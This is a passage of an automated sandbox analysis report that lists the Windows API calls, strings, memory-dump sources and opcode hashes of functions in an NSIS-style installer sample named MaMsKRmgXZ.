                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                      • String ID: f
                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                      • Opcode ID: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                                                                                                                      • Instruction ID: 78e79842b3afbaa1123eb4bc953d8a824fe30bd623f786c3032228cde2642f29
                                                                                                                                      • Opcode Fuzzy Hash: b655f89ca4bb62ef2ecf269f26a72b4f16410e1a4a94cceed0b0bba942de31e0
                                                                                                                                      • Instruction Fuzzy Hash: DA018071D40218BAEB00DB94DC81BFEBBB8AB45B11F10412BBA00B61D0C7B469418BA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetDC.USER32(?), ref: 00401E02
                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                                                                                      • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                                                                                                      • CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E84
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                      • String ID: Calibri
                                                                                                                                      • API String ID: 3808545654-1409258342
                                                                                                                                      • Opcode ID: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                                                                                                                      • Instruction ID: f74e6b169c59b5c86824efe7ff79e827475fcd3c365d9a6f340974a330803a43
                                                                                                                                      • Opcode Fuzzy Hash: 02699fb8e5746cd42e9bc81a7398f0b4a801f797f07dd38d0fd2bed2daf6de53
                                                                                                                                      • Instruction Fuzzy Hash: 6001B571948341AFE7019BB0AE49F9A7FB4EB15304F108479F201B72E2C6B851509B2F
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
                                                                                                                                      • MulDiv.KERNEL32(0012CFD5,00000064,0012EA18), ref: 00402D23
                                                                                                                                      • wsprintfA.USER32 ref: 00402D33
                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00402D43
                                                                                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D55
                                                                                                                                      Strings
                                                                                                                                      • verifying installer: %d%%, xrefs: 00402D2D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                      • String ID: verifying installer: %d%%
                                                                                                                                      • API String ID: 1451636040-82062127
                                                                                                                                      • Opcode ID: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                                                                                                                      • Instruction ID: 989b2dafafbc5add767bef13d928cf85595003a1ad1b8b7172a09c7de12a9e27
                                                                                                                                      • Opcode Fuzzy Hash: be9cfeef7a30176cc4b43e70d30b18a0c7ce5305aee0f330691da59d71d99e6c
                                                                                                                                      • Instruction Fuzzy Hash: 3801EC71A40209ABEF20AF60DD49FAE3769EB04305F008039FA06AA1D0D7B599558F59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6EC02447
                                                                                                                                        • Part of subcall function 6EC01224: lstrcpynA.KERNEL32(00000000,?,6EC012CF,-6EC0404B,6EC011AB,-000000A0), ref: 6EC01234
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 6EC023C2
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6EC023D7
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6EC023E8
                                                                                                                                      • CLSIDFromString.OLE32(00000000,00000000), ref: 6EC023F6
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 6EC023FD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9908323213.000000006EC01000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EC00000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9908269121.000000006EC00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908365679.000000006EC03000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9908406672.000000006EC05000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6ec00000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3730416702-0
                                                                                                                                      • Opcode ID: 7d4312243161d5475bb9dbcc37e249ce987ee38c95bd2d3dc8285302168b7c30
                                                                                                                                      • Instruction ID: 4ac049c724b95f92c1abc454902f2da705ef4f2b29e7340d7ef82aa9e3609f53
                                                                                                                                      • Opcode Fuzzy Hash: 7d4312243161d5475bb9dbcc37e249ce987ee38c95bd2d3dc8285302168b7c30
                                                                                                                                      • Instruction Fuzzy Hash: 9D41CE71508701EFD7188FEA8854B6AB7FCFB42329F01482EE955D7292F7329A04CB61
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 0040284C
                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 0040285F
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
                                                                                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2667972263-0
                                                                                                                                      • Opcode ID: 65199455fe1c80487f02215d0fef0016981626ec036ad2654a2deead1ba08cb2
                                                                                                                                      • Instruction ID: ec0d33f595d451752a188c19515fdbd8f87975fde9c964b970e1a5072f162152
                                                                                                                                      • Opcode Fuzzy Hash: 65199455fe1c80487f02215d0fef0016981626ec036ad2654a2deead1ba08cb2
                                                                                                                                      • Instruction Fuzzy Hash: 7D219C72C00124BBCF213FA5CD49DAE7F79EF09364B10823AF520762E0C67959419FA9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(Nagari Setup: Installing,Nagari Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
                                                                                                                                      • wsprintfA.USER32 ref: 00404957
                                                                                                                                      • SetDlgItemTextA.USER32(?,Nagari Setup: Installing), ref: 0040496A
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                                                      • String ID: %u.%u%s%s$Nagari Setup: Installing
                                                                                                                                      • API String ID: 3540041739-1160857318
                                                                                                                                      • Opcode ID: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                                                                                                                      • Instruction ID: 99a67daf6c97d227f7cf07030b4f4762c36886faa54bbd44db56b2f9a5a008fd
                                                                                                                                      • Opcode Fuzzy Hash: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
                                                                                                                                      • Instruction Fuzzy Hash: 4F110D7350812937DB00656D9C45EEF328CDF85374F254637FA25F21D1EA78DC1252A8
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • GetDlgItem.USER32(?), ref: 00401D58
                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00401D9F
                                                                                                                                      • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                                                                                                      • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1849352358-0
                                                                                                                                      • Opcode ID: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
                                                                                                                                      • Instruction ID: 879b8917e8c3c9b7c2a93b5436fc05cb0971dbd0d1073f8587bede8dddcc77ec
                                                                                                                                      • Opcode Fuzzy Hash: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
                                                                                                                                      • Instruction Fuzzy Hash: CC2196B2E04109AFDB01DF98DD44AEE7BB5FB48300F10803AF905F6290C7789941CB58
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7
                                                                                                                                        • Part of subcall function 00405A0B: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                                                                                                                        • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
                                                                                                                                        • Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32
                                                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AB3
                                                                                                                                      • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\), ref: 00405AC3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp
                                                                                                                                      • API String ID: 3248276644-107744906
                                                                                                                                      • Opcode ID: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
                                                                                                                                      • Instruction ID: fa13fd96d81fd76c8fc81ec80775158a1daeec84e0c55be597840f6fdc29cec0
                                                                                                                                      • Opcode Fuzzy Hash: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
                                                                                                                                      • Instruction Fuzzy Hash: D5F0C825305D6616D62233361C85EAF1649CE82364715473FF851B12D3DB3C8943DE7E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405978
                                                                                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405981
                                                                                                                                      • lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 00405992
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405972
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                      • API String ID: 2659869361-3355392842
                                                                                                                                      • Opcode ID: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
                                                                                                                                      • Instruction ID: 0da8bf888325795cdd0c5347214511d48edcf337a1f8d4df24ff951c9a6f7455
                                                                                                                                      • Opcode Fuzzy Hash: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
                                                                                                                                      • Instruction Fuzzy Hash: C7D0A9A2605A716AD21223199C09EDB2A0CCF02314B080063F600B22A3CA3C1D018BFE
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Close$Enum
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 464197530-0
                                                                                                                                      • Opcode ID: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
                                                                                                                                      • Instruction ID: a6da729fb9552a58d385ec1c0953cf8d4b7f97d7084d0a629d1ed2eab5a533bf
                                                                                                                                      • Opcode Fuzzy Hash: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
                                                                                                                                      • Instruction Fuzzy Hash: 8E115B32904109BBEF129F50DE09B9E7B6DEB54380F104072BE05B51E0E7B59E11AAA9
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,?,00405A77,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp,751D3410,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,751D3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A19
                                                                                                                                      • CharNextA.USER32(00000000), ref: 00405A1E
                                                                                                                                      • CharNextA.USER32(00000000), ref: 00405A32
                                                                                                                                      Strings
                                                                                                                                      • C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp, xrefs: 00405A0C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CharNext
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp
                                                                                                                                      • API String ID: 3213498283-1038464266
                                                                                                                                      • Opcode ID: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
                                                                                                                                      • Instruction ID: a4ce128402f48f1feafc2c55b1118e7c053650975221e3f5fcc16cd8d0856992
                                                                                                                                      • Opcode Fuzzy Hash: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
                                                                                                                                      • Instruction Fuzzy Hash: 13F0C251B04F916BFB32A2280CD4F6B5B88CB55365F145267E280672C2C27C88408F9A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,00402F3E,00000001), ref: 00402D73
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402D91
